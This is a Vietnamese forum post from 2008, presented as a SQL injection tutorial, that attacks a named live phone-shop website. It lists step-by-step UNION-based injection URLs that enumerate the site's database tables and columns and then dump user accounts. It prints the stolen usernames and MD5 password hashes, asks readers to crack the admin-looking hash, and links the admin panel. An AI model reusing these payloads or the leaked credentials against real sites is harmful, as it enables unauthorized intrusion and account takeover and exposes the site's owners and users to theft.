[Tut] Blind sql injection : DiemSangViet.Net

quangvu

05-08-2008, 09:10 AM

Khai trương cho box.
Bài này thực ra là 1 bài khá căn bản, các bạn có thể tìm đọc hướng dẫn tươg tự rất nhiều trên internet.
Tut by: talama3000[at]VBF[dot]NET
Tham khảo tại milw0rm: SQL Injection Tutorial by Marezzi (MySQL) : http://www.milw0rm.com/papers/202

http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
http://gdataonline.com/

Hello mọi người
hôm nay dạo chơi một vòng thấy có site Http://DiemSangViet.net nó bị lỗi nên em làm cái tut
lần đầu làm tut mong mọi người thông cảm nhé
Victim:Http://DiemSangViet.Net
cái site đó toàn điện thoại di đông hem biết đã có anh nào check chưa
em vào đó chơi tí

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90

site này nó bằng php
giờ thử check bằng and 1=1 và and 1=0 xem có gì không

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1


http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=0
mọi người xem có gì khác biệt không
giờ thử đếm bằng order by xx--
xx là một số nào đó


http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 order by 20--
ở đây em cứ thử đếm từ 20 đổ về 0
đếm đến 3 thì thấy nó trở về như cái

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1

tiếp nào

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,2,3--


mọi người thấy gì chưa
nó hiện ra số 2 đẹp ghê
tìm version

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,version(),3--



Quote:
5.0.27

có thể dùng information.... được
giờ tìm table_name

http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,table_name,3%20from%2 0information_schema.tables--

Điện thoại vỏ gỗ-Mobiado

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

KEY_COLUMN_USAGE

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

counter

df_cate

df_user

plus_poll

plus_poll_ans

tbl_banner

tbl_cart

tbl_category

tbl_contact

tbl_counter

tbl_faq

tbl_group

tbl_groupnew

tbl_intro

phát ra luôn
nhìn thấy cái


df_user
hay hay giờ thử chuyển nó sang ascii xem
dùng web


http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

để chuyển
và nó đây

Quote:
100, 102, 95, 117, 115, 101, 114

giờ tìm colum_name


http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,column_name,3%20from% 20information_schema.columns%20where%20table_name= %20char(100,%20102,%2095,%20117,%20115,%20101,%201 14)%20--

Điện thoại vỏ gỗ-Mobiado
user_id
user_name
user_password
user_regdate

giờ lấy thông tin thôi


http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,concat(user_name,char(47),user_password ),3 from df_user --

char(58) = dấu /

kết quả


acc/pass
winman/14ddd4dd79acd79cf361b4b384e40c7d

acc/pass
guest/e10adc3949ba59abbe56e057f20f883e
nhìn cái pass e10adc3949ba59abbe56e057f20f883e quen quen nó là 123456
còn cái 14ddd4dd79acd79cf361b4b384e40c7d em đã thử dùng gdataonlin.com nhưng không được
anh nào crack được pass thì cho em biết với nhé
link admin:
http://diemsangviet.net/admin

url: http://ddcntt.vn/forum/archive/index.php/t-1466.html